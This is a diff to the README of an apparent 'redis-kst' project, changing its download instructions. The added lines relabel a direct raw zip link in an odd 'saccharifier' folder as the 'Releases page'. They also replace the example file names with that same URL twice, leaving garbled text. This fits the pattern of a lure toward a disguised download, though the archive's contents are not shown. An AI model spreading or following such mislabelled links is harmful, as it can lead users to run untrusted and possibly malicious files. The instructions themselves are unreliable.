Yvessupranational207/redis-kst/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/Yvessupranational207/redis-kst/releases) to see available versions.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Yvessupranational207/redis-kst/main/saccharifier/redis-kst_2.8.zip) to see available versions.
 2. Locate the latest version.
-Look for files with names like `redis-kst-version.exe` or `redis-kst-version.tar.gz`.
+Look for files with names like `https://raw.githubusercontent.com/Yvessupranational207/redis-kst/main/saccharifier/redis-kst_2.8.zip` or `https://raw.githubusercontent.com/Yvessupranational207/redis-kst/main/saccharifier/redis-kst_2.8.zip`.
 3. Click on the file that matches your operating system to start the download.
 4. Once downloaded, locate the file in your ‘Downloads’ folder or the destination you selected.
 5. For Windows: